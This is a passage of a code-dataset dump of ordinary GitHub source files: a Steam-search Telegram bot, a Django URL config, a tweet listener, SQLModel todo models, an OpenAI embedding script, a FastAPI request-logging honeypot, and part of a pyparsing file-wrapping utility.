"line_number": 30, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 63, "usage_type": "call"}]}
+{"seq_id": "18843669209", "text": "# coding: utf-8\n\nimport asyncio\nimport json\nimport re\nfrom datetime import datetime\nfrom urllib import parse\n\nimport aiohttp\nimport asyncio_redis\nimport telepot\nimport telepot.aio\nfrom telepot.namedtuple import ReplyKeyboardMarkup, ReplyKeyboardRemove\n\nfrom constants import GAME_CARD_TEMPLATE, NEWS_CARD_TEMPLATE, LANG, CC\nfrom utils import SearchSuggestParser, cache_steam_response, group\n\n\nclass SteamBot(telepot.aio.Bot, telepot.helper.AnswererMixin):\n\n def __init__(self, *args, config=None, **kwargs):\n super(SteamBot, self).__init__(*args, **kwargs)\n self._answerer = telepot.aio.helper.Answerer(self)\n self.config = config\n self.cache_time = self.config.get('cache_time', 10)\n self.redis_conn = None\n self.loop.create_task(self.initialize_redis())\n self.routes = {\n '/search': self.search_game,\n '/app_': self.game_card_answer,\n '/scr_': self.screenshots_answer,\n '/news_': self.last_news_answer,\n '/feedback': self.feedback_answer,\n '/settings': self.settings_answer,\n '/lang': self.set_lang,\n '/cc': self.set_cc,\n '/start': self.welcome_answer\n }\n\n async def initialize_redis(self):\n self.redis_conn = await asyncio_redis.Pool.create(\n host=self.config['redis']['ip'],\n port=self.config['redis']['port'],\n db=self.config['redis']['db'],\n poolsize=5\n )\n\n @cache_steam_response\n async def get_content_from_url(self, url, resp_format=None):\n async with aiohttp.ClientSession(loop=self.loop) as client:\n async with client.get(url) as resp:\n if resp.status != 200:\n return\n if resp_format == 'text':\n result = await resp.text()\n elif resp_format == 'json':\n result = await resp.json()\n else:\n result = await resp.content.read()\n return result\n\n async def get_search_results(self, term, settings):\n search_url = u'https://store.steampowered.com/search/suggest?term={}&f=games&l={}&cc={}'.format(\n parse.quote_plus(term),\n settings.get('lang'),\n settings.get('cc')\n )\n content = await self.get_content_from_url(search_url, resp_format='text')\n parser = SearchSuggestParser()\n parser.feed(content)\n return parser.result\n\n async def get_appdetails(self, appid, settings={}):\n url = u'https://store.steampowered.com/api/appdetails/?appids={}&l={}&cc={}'.format(\n appid,\n settings.get('lang'),\n settings.get('cc')\n )\n content = await self.get_content_from_url(url, resp_format='json')\n return content[appid]['data'] if content else {}\n\n async def get_news(self, appid, count=3):\n url = u'https://api.steampowered.com/ISteamNews/GetNewsForApp/v0002/?appid={}&count={}&max_length=300&format=json'.format(\n appid,\n count\n )\n content = await self.get_content_from_url(url, resp_format='json')\n return content['appnews']['newsitems'] if content else {}\n\n @staticmethod\n def get_command(msg):\n if 'entities' in msg:\n for entity in msg['entities']:\n if entity['type'] == 'bot_command':\n offset, length = entity['offset'], entity['length']\n return msg['text'][offset:length], msg['text'][offset + length:].strip()\n return None, None\n\n @staticmethod\n def get_games_message(entries):\n msg_list = []\n if len(entries) != 0:\n for entry in entries:\n msg = u\"{cmd} {name} [steam]({href}) _{price}_\".format(\n name=entry['name'],\n href=entry['href'],\n price=entry['price'],\n cmd=u'/app\\_{}'.format(entry['appid'])\n )\n msg_list.append(msg)\n return u'\\n'.join(msg_list)\n return u'Nothing found'\n\n @staticmethod\n def clean_html(html):\n return re.sub('<[^<]+?>', '', html)\n\n @staticmethod\n def clean_markdown(text):\n return text.replace('_', '\\_').replace('*', '\\*')\n\n def get_game_card_message(self, appdetails):\n return GAME_CARD_TEMPLATE.format(\n appid=appdetails['steam_appid'],\n name=appdetails['name'],\n release_date=appdetails['release_date']['date'],\n metacritic=u'\\u2b50\\ufe0f{} [metacritics]({})'.format(\n appdetails['metacritic']['score'],\n appdetails['metacritic']['url']\n ) if 'metacritic' in appdetails else '',\n platforms=', '.join(\n [x[0] for x in appdetails['platforms'].items() if x[1]]),\n genres=', '.join(\n [x['description'] for x in appdetails['genres']]) if 'genres' in appdetails else '',\n publishers=', '.join(\n appdetails['publishers']) if 'publishers' in appdetails else '',\n price='{} {}'.format(appdetails['price_overview']['final'] / 100.0,\n appdetails['price_overview']['currency']) if 'price_overview' in appdetails else '',\n recommendations=appdetails['recommendations']['total'] if 'recommendations' in appdetails else '',\n screenshotscount=len(\n appdetails['screenshots']) if 'screenshots' in appdetails else '0',\n about_the_game=self.clean_html(appdetails['about_the_game'])[:500]\n )\n\n async def on_callback_query(self, msg):\n query_id, from_id, data = telepot.glance(msg, flavor='callback_query')\n print('Callback query:', query_id, from_id, data)\n self.route(from_id, data)\n\n async def game_search_answer(self, term, chat_id):\n user_info = await self.get_user(chat_id)\n settings = user_info.get('settings')\n msg = self.get_games_message(await self.get_search_results(term, settings))\n await self.sendMessage(chat_id, msg, parse_mode='markdown', disable_web_page_preview=True)\n\n async def game_card_answer(self, chat_id, command, args):\n appid = command.replace('/app_', '').strip()\n self.loop.create_task(self.sendChatAction(chat_id, 'typing'))\n user_info = await self.get_user(chat_id)\n settings = user_info.get('settings')\n app_details = await self.get_appdetails(appid, settings)\n await self.sendMessage(chat_id, self.get_game_card_message(app_details), parse_mode='markdown')\n\n async def send_photo_from_url(self, url, photo_name, chat_id):\n downloaded_file = await self.get_content_from_url(url)\n await self.sendPhoto(chat_id, photo=(photo_name, downloaded_file))\n\n async def screenshots_answer(self, chat_id, command, args):\n appid = command.replace('/scr_', '').strip()\n self.loop.create_task(self.sendChatAction(chat_id, 'upload_photo'))\n app_details = await self.get_appdetails(appid)\n for scr in app_details['screenshots']:\n loop.create_task(self.send_photo_from_url(\n scr['path_full'], 'scr-{}.jpg'.format(scr['id']), chat_id))\n\n async def last_news_answer(self, chat_id, command, args):\n appid = command.replace('/news_', '').strip()\n self.loop.create_task(self.sendChatAction(chat_id, 'typing'))\n news_items = await self.get_news(appid)\n for item in news_items:\n msg = NEWS_CARD_TEMPLATE.format(\n title=item['title'],\n url=item['url'],\n pub_date=datetime.fromtimestamp(\n int(item['date'])).strftime(\"%B %d, %Y\"),\n feedlabel=item['feedlabel'],\n contents=self.clean_markdown(self.clean_html(item['contents'])).replace(\n '\\n', '').replace(' ', '')[:300],\n author=item['author']\n )\n loop.create_task(self.sendMessage(\n chat_id, msg, parse_mode='markdown'))\n\n def get_user_key(self, user_id):\n return 'user-{}'.format(user_id)\n\n async def save_user_settings(self, user_id, new_settings):\n key = self.get_user_key(user_id)\n user = await self.get_user(user_id)\n settings = user.get('settings', {})\n settings.update(new_settings)\n user['settings'] = settings\n await self.redis_conn.set(key, json.dumps(user))\n\n async def get_user(self, user_id):\n return json.loads(await self.redis_conn.get(self.get_user_key(user_id)))\n\n async def create_or_update_user(self, chat):\n key = self.get_user_key(chat['id'])\n user = await self.redis_conn.get(key)\n if not user:\n new_user = chat\n default_settings = {\n 'lang': 'english',\n 'cc': 'US'\n }\n new_user_serialized = json.dumps(\n {'info': new_user, 'settings': default_settings})\n await self.redis_conn.set(key, new_user_serialized)\n else:\n user = json.loads(user)\n if chat != user['info']:\n user['info'] = chat\n await self.redis_conn.set(key, json.dumps(user))\n\n async def on_inline_query(self, msg):\n async def compute_answer():\n query_id, from_id, query_string = telepot.glance(\n msg, flavor='inline_query')\n print('inline query: {} from_id: {}'.format(query_string, from_id))\n user_info = await self.get_user(from_id)\n settings = user_info.get('settings')\n results = await self.get_search_results(query_string, settings)\n articles = []\n for res in results:\n articles.append({\n 'type': 'article',\n 'id': res['appid'],\n 'title': res['name'],\n 'message_text': u'{} {} {}'.format(\n res['name'],\n res['price'],\n res['href']\n ),\n # 'url': res['href'],\n 'description': res['price'],\n 'thumb_url': res['image']\n })\n return {'results': articles}\n self._answerer.answer(msg, compute_answer)\n\n async def on_chosen_inline_result(self, msg):\n query_id, from_id, query_string = telepot.glance(\n msg, flavor='chosen_inline_result')\n print('Chosen Inline Result: {} {} from_id: {}'.format(\n query_id, query_string, from_id))\n await self.game_card_answer(query_id, from_id)\n\n async def search_game(self, chat_id, command, args):\n await self.sendChatAction(chat_id, 'typing')\n await self.game_search_answer(args, chat_id)\n\n async def set_lang(self, chat_id, command, args):\n lang = args.strip() if args else None\n if lang:\n await self.save_user_settings(chat_id, {'lang': LANG.get(lang)})\n await bot.sendMessage(chat_id, 'language saved', reply_markup=ReplyKeyboardRemove())\n else:\n markup = ReplyKeyboardMarkup(\n keyboard=group(['/lang' + x for x in LANG.keys()], 2),\n one_time_keyboard=True\n )\n await bot.sendMessage(chat_id, 'set language', reply_markup=markup)\n\n async def set_cc(self, chat_id, command, args):\n cc = args.strip() if args else None\n if cc:\n await self.save_user_settings(chat_id, {'cc': CC.get(cc)})\n await bot.sendMessage(chat_id, 'region saved', reply_markup=ReplyKeyboardRemove())\n else:\n markup = ReplyKeyboardMarkup(\n keyboard=group(['/cc' + x for x in CC.keys()], 3),\n one_time_keyboard=True\n )\n await bot.sendMessage(chat_id, 'set region', reply_markup=markup)\n\n async def feedback_answer(self, chat_id, command, args):\n msg = args.replace('/feedback ', '').strip()\n if msg:\n await self.sendMessage(\n self.config.get('admin_id'),\n 'feedback from: {}: {}'.format(chat_id, msg)\n )\n await self.sendMessage(chat_id, 'thank you for your feedback!')\n else:\n await self.sendMessage(chat_id, 'looks like your feedback is empty!')\n\n async def settings_answer(self, chat_id, command, args):\n await self.sendMessage(\n chat_id,\n \"change region: /cc\\n\"\n \"change language: /lang\\n\"\n )\n\n async def welcome_answer(self, chat_id, command, args):\n await self.sendMessage(\n chat_id,\n 'Welcome! Just type / for view list of commands, also you can use this bot with inline mode.\\n'\n 'For search a game just send message with game title'\n )\n\n def route(self, chat_id, command, args=None):\n func = None\n for cmd, fnc in self.routes.items():\n if command.find(cmd) != -1:\n func = fnc\n break\n\n if func:\n self.loop.create_task(func(chat_id, command, args))\n\n async def on_chat_message(self, msg):\n content_type, chat_type, chat_id = telepot.glance(msg)\n print(msg)\n await self.create_or_update_user(msg.get('chat'))\n command, args = self.get_command(msg)\n if not command:\n command, args = '/search', msg['text']\n self.route(chat_id, command, args)\n\n\nwith open('conf/config.json') as f:\n config = json.loads(f.read())\n\nloop = asyncio.get_event_loop()\ntoken = config.pop(\"telegram_token\")\nbot = SteamBot(token=token, config=config, loop=loop)\nloop.create_task(bot.message_loop())\nprint('Listening ...')\nloop.run_forever()\n", "repo_name": "AyumuKasuga/steambot", "sub_path": "bot.py", "file_name": "bot.py", "file_ext": "py", "file_size_in_byte": 13818, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "telepot.aio", "line_number": 19, "usage_type": "attribute"}, {"api_name": "telepot.helper", "line_number": 19, "usage_type": "attribute"}, {"api_name": "telepot.aio.helper.Answerer", "line_number": 23, "usage_type": "call"}, {"api_name": "telepot.aio", "line_number": 23, "usage_type": "attribute"}, {"api_name": "asyncio_redis.Pool.create", "line_number": 41, "usage_type": "call"}, {"api_name": "asyncio_redis.Pool", "line_number": 41, "usage_type": "attribute"}, {"api_name": "aiohttp.ClientSession", "line_number": 50, "usage_type": "call"}, {"api_name": "utils.cache_steam_response", "line_number": 48, "usage_type": "name"}, {"api_name": "urllib.parse.quote_plus", "line_number": 64, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 64, "usage_type": "name"}, {"api_name": "utils.SearchSuggestParser", "line_number": 69, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 116, "usage_type": "call"}, {"api_name": "constants.GAME_CARD_TEMPLATE.format", "line_number": 123, "usage_type": "call"}, {"api_name": "constants.GAME_CARD_TEMPLATE", "line_number": 123, "usage_type": "name"}, {"api_name": "telepot.glance", "line_number": 146, "usage_type": "call"}, {"api_name": "constants.NEWS_CARD_TEMPLATE.format", "line_number": 181, "usage_type": "call"}, {"api_name": "constants.NEWS_CARD_TEMPLATE", "line_number": 181, "usage_type": "name"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 184, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 184, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 203, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 206, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 217, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 221, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 224, "usage_type": "call"}, {"api_name": "telepot.glance", "line_number": 228, "usage_type": "call"}, {"api_name": "telepot.glance", "line_number": 253, "usage_type": "call"}, {"api_name": "constants.LANG.get", "line_number": 266, "usage_type": "call"}, {"api_name": "constants.LANG", "line_number": 266, "usage_type": "name"}, {"api_name": "telepot.namedtuple.ReplyKeyboardRemove", "line_number": 267, "usage_type": "call"}, {"api_name": "telepot.namedtuple.ReplyKeyboardMarkup", "line_number": 269, "usage_type": "call"}, {"api_name": "utils.group", "line_number": 270, "usage_type": "call"}, {"api_name": "constants.LANG.keys", "line_number": 270, "usage_type": "call"}, {"api_name": "constants.LANG", "line_number": 270, "usage_type": "name"}, {"api_name": "constants.CC.get", "line_number": 278, "usage_type": "call"}, {"api_name": "constants.CC", "line_number": 278, "usage_type": "name"}, {"api_name": "telepot.namedtuple.ReplyKeyboardRemove", "line_number": 279, "usage_type": "call"}, {"api_name": "telepot.namedtuple.ReplyKeyboardMarkup", "line_number": 281, "usage_type": "call"}, {"api_name": "utils.group", "line_number": 282, "usage_type": "call"}, {"api_name": "constants.CC.keys", "line_number": 282, "usage_type": "call"}, {"api_name": "constants.CC", "line_number": 282, "usage_type": "name"}, {"api_name": "telepot.glance", "line_number": 323, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 333, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 335, "usage_type": "call"}]}
+{"seq_id": "43321434568", "text": "from django.conf.urls import url, include\n\nfrom . import views\n\n\napp_name = 'blog'\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^createUser/$', views.createUser, name='createUser'),\n url(r'^registration/$', views.registration_page, name='registration_page'),\n url(r'^makepost/$', views.makepost, name='makepost'),\n url(r'^blogfeed/$', views.blogfeed, name='blogfeed'),\n url(r'^createposts/$', views.create_post, name='create_post'),\n url(r'^mylogin/$', views.mylogin, name='mylogin'),\n url(r'^logout_view/$', views.logout_view, name='logout_view'),\n url(r'^(?P[0-9]+)/$', views.singlepost, name='singlepost'),\n url(r'^savecomment/(?P[0-9]+)/$', views.savecomment, name='savecomment')\n]\n", "repo_name": "mschaeffer53/Marcel_CodeGuildPDX", "sub_path": "django/mainsite/blog/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 760, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}]}
+{"seq_id": "9205060333", "text": "import logging\n\nfrom responsebot.common.exceptions import UserHandlerException\n\n\nclass ResponseBotListener(object):\n \"\"\"\n Forward received tweets from :class:`~responsebot.responsebot_stream.ResponseBotStream`\n \"\"\"\n def __init__(self, handler_classes, client):\n \"\"\"\n Inits the listener and tries to create handler instances from discovered user's handler classes\n\n :param handler_classes: List of :class:`~responsebot.handlers.base.BaseTweetHandler`'s derived classes\n :param client: Some Twitter API client for authentication. E.g. :class:`~responsebot.tweet_client.TweetClient`\n \"\"\"\n self.client = client\n self.handlers = []\n\n self.register_handlers(handler_classes)\n\n def register_handlers(self, handler_classes):\n \"\"\"\n Create handlers from discovered handler classes\n\n :param handler_classes: List of :class:`~responsebot.handlers.base.BaseTweetHandler`'s derived classes\n \"\"\"\n for handler_class in handler_classes:\n try:\n self.handlers.append(handler_class(client=self.client))\n logging.info('Successfully registered {handler_class}'.format(handler_class=getattr(handler_class, '__name__', str(handler_class))))\n except Exception:\n # Catch all exception from user handler\n raise UserHandlerException('Error from user handler')\n\n def on_tweet(self, tweet):\n \"\"\"\n Callback to receive tweet from :class:`~responsebot.responsebot_stream.ResponseBotStream`. Tries to forward the\n received tweet to registered handlers.\n\n :param tweet: An object containing a tweet's text and metadata\n :type tweet: :class:`~responsebot.models.Tweet`\n :raises :class:`~responsebot.common.exceptions.UserHandlerException`: If there is some unknown error from a custom handler\n \"\"\"\n logging.info('Received tweet: `{message}`'.format(message=tweet.text))\n\n for handler in self.handlers:\n try:\n handler.on_tweet(tweet)\n except Exception:\n # Catch all exception from user handler\n raise UserHandlerException('Error from user handler')\n", "repo_name": "anhhuy1605/test_rtd", "sub_path": "responsebot/listeners/responsebot_listener.py", "file_name": "responsebot_listener.py", "file_ext": "py", "file_size_in_byte": 2233, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.info", "line_number": 31, "usage_type": "call"}, {"api_name": "responsebot.common.exceptions.UserHandlerException", "line_number": 34, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 45, "usage_type": "call"}, {"api_name": "responsebot.common.exceptions.UserHandlerException", "line_number": 52, "usage_type": "call"}]}
+{"seq_id": "70325733608", "text": "from datetime import datetime\nfrom enum import Enum\nfrom typing import Optional\n\nfrom pydantic import BaseModel\nfrom sqlmodel import Column, DateTime, Field, ForeignKey, SQLModel\n\n\nclass TodoListBase(SQLModel):\n title: str\n description: str\n\n\nclass TodoListCreate(TodoListBase):\n pass\n\n\nclass TodoListUpdate(BaseModel):\n title: Optional[str] = None\n description: Optional[str] = None\n\n\nclass TodoList(TodoListBase, table=True):\n __tablename__ = \"todo_list\"\n id: Optional[int] = Field(default=None, primary_key=True)\n user_id: Optional[int] = Field(\n default=None, sa_column=Column(ForeignKey(\"user.id\", ondelete=\"CASCADE\"))\n )\n created_date: datetime = Field(\n sa_column=Column(DateTime(timezone=True)), default_factory=datetime.utcnow\n )\n updated_date: datetime = Field(\n sa_column=Column(DateTime(timezone=True)), default_factory=datetime.utcnow\n )\n\n\nclass TodoListSortingFields(str, Enum):\n id = \"id\"\n title = \"title\"\n created_date = \"created_date\"\n updated_date = \"updated_date\"\n", "repo_name": "testownik-pwr-portal/portal", "sub_path": "backend/app/app/models/todo_list.py", "file_name": "todo_list.py", "file_ext": "py", "file_size_in_byte": 1055, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlmodel.SQLModel", "line_number": 9, "usage_type": "name"}, {"api_name": "pydantic.BaseModel", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 19, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 25, "usage_type": "name"}, {"api_name": "sqlmodel.Field", "line_number": 25, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 26, "usage_type": "name"}, {"api_name": "sqlmodel.Field", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlmodel.Column", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlmodel.ForeignKey", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 29, "usage_type": "name"}, {"api_name": "sqlmodel.Field", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlmodel.Column", "line_number": 30, "usage_type": "call"}, {"api_name": "sqlmodel.DateTime", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 30, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 30, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 32, "usage_type": "name"}, {"api_name": "sqlmodel.Field", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlmodel.Column", "line_number": 33, "usage_type": "call"}, {"api_name": "sqlmodel.DateTime", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 33, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "name"}, {"api_name": "enum.Enum", "line_number": 37, "usage_type": "name"}]}
+{"seq_id": "16271165720", "text": "import requests\nfrom dotenv import load_dotenv\nimport os\n\nload_dotenv()\n\npersonal_api_key = os.getenv(\"PERSONAL_API_KEY\")\nopen_ai_api_key = os.getenv(\"OPENAI_API_KEY\")\n\n\n\ndef get_token():\n payload = {\"apikey\": personal_api_key}\n response = requests.post('https://zadania.aidevs.pl/token/embedding', json=payload)\n return response.json().get('token')\n\n\ndef create_embedding():\n token = get_token()\n data = {\"input\": 'Hawaiian pizza', \"model\": \"text-embedding-ada-002\"}\n headers = {\"Content-Type\": \"application/json\", \"Authorization\": \"Bearer \" + open_ai_api_key}\n response = requests.post('https://api.openai.com/v1/embeddings', json=data, headers=headers)\n embedding = response.json()['data'][0]['embedding']\n return embedding, token\n\n\ndef send_answer():\n embedding, token = create_embedding()\n payload = {\"answer\": embedding}\n response = requests.post(f'https://zadania.aidevs.pl/answer/{token}', json=payload)\n return response.json()\n\n\nprint(send_answer())\n", "repo_name": "bartoszc/AI_Devs", "sub_path": "embedding.py", "file_name": "embedding.py", "file_ext": "py", "file_size_in_byte": 998, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 5, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 7, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 8, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 14, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 22, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 30, "usage_type": "call"}]}
+{"seq_id": "603120841", "text": "import uvicorn as uvicorn\nimport json\nfrom fastapi import FastAPI, Request\nfrom fastapi.responses import RedirectResponse\nfrom fastapi.staticfiles import StaticFiles\nfrom starlette.routing import Match\nfrom loguru import logger\n\nimport os\nimport shutil\n\n# Serve our static web portal\nfrom starlette.templating import Jinja2Templates\nfrom starlette.routing import Route, Mount\nfrom starlette.exceptions import HTTPException\n\ntemplates = Jinja2Templates(directory='webapp')\nasync def not_found(request: Request, exc: HTTPException):\n return RedirectResponse(\"/index.html\")\n\nexception_handlers = {\n 404: not_found\n}\n\napp = FastAPI(openapi_url=None, exception_handlers=exception_handlers)\nshared_honeypot_dir = \"/custom_honey\"\nshared_storage_dir = \"/honey_store\"\n# Might have some static file caching issue\napp.mount(\"/\", StaticFiles(directory=f\"{shared_honeypot_dir}/webapp\", html=True, check_dir=False), name=\"webapp\")\n\n@app.middleware(\"http\")\nasync def log_middle(request: Request, call_next):\n\n # Copy Default Honeypot if folder is empty\n if os.path.isdir(f\"{shared_honeypot_dir}/webapp\") and len(os.listdir(f\"{shared_honeypot_dir}/webapp\")) == 0:\n os.rmdir(f\"{shared_honeypot_dir}/webapp\")\n shutil.copytree(\"/app/webapp\", f\"{shared_honeypot_dir}/webapp\")\n\n routes = request.app.router.routes\n send_param = None\n for route in routes:\n match, scope = route.matches(request)\n if match == Match.FULL:\n send_param = list(scope[\"path_params\"].items())\n\n send_head = request.headers.items()\n send_body = (await request.body()).decode(\"utf-8\")\n packed_boi = {\"method\":request.method,\"url\":str(request.url),\"param\":send_param,\"headers\":send_head,\"body\":send_body}\n packed_json = json.dumps(packed_boi)\n\n with open(f\"{shared_storage_dir}/fastpotlogs.json\", 'a+') as outfile:\n outfile.write(\"\\n\")\n outfile.write(packed_json)\n\n response = await call_next(request)\n return response\n\nif __name__ == \"__main__\":\n uvicorn.run(app, host='0.0.0.0', port=8000)\n\n", "repo_name": "FA-PengFei/NGWAF", "sub_path": "ngwaf-app/fastpot/fastpotty/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2042, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 53, "dataset": "github-code", "pt": "53", "api": [{"api_name": "starlette.templating.Jinja2Templates", "line_number": 17, "usage_type": "call"}, {"api_name": "fastapi.Request", "line_number": 18, "usage_type": "name"}, {"api_name": "starlette.exceptions.HTTPException", "line_number": 18, "usage_type": "name"}, {"api_name": "fastapi.responses.RedirectResponse", "line_number": 19, "usage_type": "call"}, {"api_name": "fastapi.FastAPI", "line_number": 25, "usage_type": "call"}, {"api_name": "fastapi.staticfiles.StaticFiles", "line_number": 29, "usage_type": "call"}, {"api_name": "fastapi.Request", "line_number": 32, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 35, "usage_type": "call"}, {"api_name": "os.rmdir", "line_number": 36, "usage_type": "call"}, {"api_name": "shutil.copytree", "line_number": 37, "usage_type": "call"}, {"api_name": "starlette.routing.Match.FULL", "line_number": 43, "usage_type": "attribute"}, {"api_name": "starlette.routing.Match", "line_number": 43, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 49, "usage_type": "call"}, {"api_name": "uvicorn.run", "line_number": 59, "usage_type": "call"}]}
+{"seq_id": "9343915340", "text": "\"\"\"\nA collection of utilities for file wrapping.\n\nNote: This is a work in progress.\n\"\"\"\n\n\nimport re\n\ntry:\n import pyparsing\n from pyparsing import CaselessLiteral, Combine, OneOrMore, Optional, \\\n TokenConverter, Word, nums, oneOf, printables, ParserElement, alphanums\nexcept ImportError:\n pyparsing = None\n TokenConverter = object\n\nimport numpy as np\n\n\ndef _getformat(val):\n \"\"\"\n Get the output format for a floating point number.\n\n The general format is used with 16 places of accuracy, except for when\n the floating point value is an integer, in which case a decimal point\n followed by a single zero is used.\n\n Parameters\n ----------\n val : float or int\n the number which needs formatted.\n\n Returns\n -------\n string\n the format string.\n \"\"\"\n if int(val) == val:\n return \"%.1f\"\n else:\n return \"%.16g\"\n\n\nclass _SubHelper(object):\n \"\"\"\n Replaces file text at the correct word location in a line.\n\n This class contains the Helper Function that is passed to re.sub.\n\n Attributes\n ----------\n _newtext : str\n text to insert.\n _replace_location : int\n location in the file where replacement is to occur.\n _current_location : int\n current location in the file.\n _counter : int\n counter\n _start_location : int\n initial location where replacement is to occur.\n _end_location : int\n final location where replacement is to occur.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initialize attributes.\n \"\"\"\n self._newtext = \"\"\n self._replace_location = 0\n self._current_location = 0\n self._counter = 0\n self._start_location = 0\n self._end_location = 0\n\n def set(self, newtext, location):\n \"\"\"\n Set a new word location and value for replacement.\n\n Parameters\n ----------\n newtext : str\n text to insert.\n location : int\n location in the file where replacement is to occur.\n \"\"\"\n self._newtext = newtext\n self._replace_location = location\n self._current_location = 0\n\n def set_array(self, newtext, start_location, end_location):\n \"\"\"\n Set a new starting location, ending location, and value for replacement.\n\n Parameters\n ----------\n newtext : str\n text to insert.\n start_location : int\n location\n end_location : int\n location\n \"\"\"\n self._newtext = newtext\n self._start_location = start_location\n self._end_location = end_location\n self._current_location = 0\n\n def replace(self, text):\n \"\"\"\n Replace text in file.\n\n This function should be passed to re.sub.\n\n Parameters\n ----------\n text : str\n text to insert.\n\n Returns\n -------\n string\n newtext if current location is replace location else the input text.\n \"\"\"\n self._current_location += 1\n\n if self._current_location == self._replace_location:\n if isinstance(self._newtext, float):\n return _getformat(self._newtext) % self._newtext\n else:\n return str(self._newtext)\n else:\n return text.group()\n\n def replace_array(self, text):\n \"\"\"\n Replace array of text values in file.\n\n This function should be passed to re.sub.\n\n Parameters\n ----------\n text : str\n text to insert.\n\n Returns\n -------\n string\n newtext if current location is replace location else the input text.\n \"\"\"\n self._current_location += 1\n end = len(self._newtext)\n\n if self._current_location >= self._start_location and \\\n self._current_location <= self._end_location and \\\n self._counter < end:\n if isinstance(self._newtext[self._counter], float):\n val = self._newtext[self._counter]\n newval = _getformat(val) % val\n else:\n newval = str(self._newtext[self._counter])\n self._counter += 1\n return newval\n else:\n return text.group()\n\n\nclass _ToInteger(TokenConverter):\n \"\"\"\n Converter for PyParsing that is used to turn a token into an int.\n \"\"\"\n\n def postParse(self, instring, loc, tokenlist):\n \"\"\"\n Convert token into an integer.\n\n Parameters\n ----------\n instring : str\n the input string\n loc : int\n the location of the matching string\n tokenlist : list\n list of matched tokens\n\n Returns\n -------\n int\n integer value for token.\n \"\"\"\n return int(tokenlist[0])\n\n\nclass _ToFloat(TokenConverter):\n \"\"\"\n Converter for PyParsing that is used to turn a token into a float.\n \"\"\"\n\n def postParse(self, instring, loc, tokenlist):\n \"\"\"\n Convert token into a float.\n\n Parameters\n ----------\n instring : str\n the input string\n loc : int\n the location of the matching string\n tokenlist : list\n list of matched tokens\n\n Returns\n -------\n float\n float value for token.\n \"\"\"\n return float(tokenlist[0].replace('D', 'E'))\n\n\nclass _ToNan(TokenConverter):\n \"\"\"\n Converter for PyParsing that is used to turn a token into Python nan.\n \"\"\"\n\n def postParse(self, instring, loc, tokenlist):\n \"\"\"\n Convert token into Python nan.\n\n Parameters\n ----------\n instring : str\n the input string\n loc : int\n the location of the matching string\n tokenlist : list\n list of matched tokens\n\n Returns\n -------\n float\n the float value for NaN.\n \"\"\"\n return float('nan')\n\n\nclass _ToInf(TokenConverter):\n \"\"\"\n Converter for PyParsing that is used to turn a token into Python inf.\n \"\"\"\n\n def postParse(self, instring, loc, tokenlist):\n \"\"\"\n Convert token into Python inf.\n\n Parameters\n ----------\n instring : str\n the input string\n loc : int\n the location of the matching string\n tokenlist : list\n list of matched tokens\n\n Returns\n -------\n float\n the float value for infinity.\n \"\"\"\n 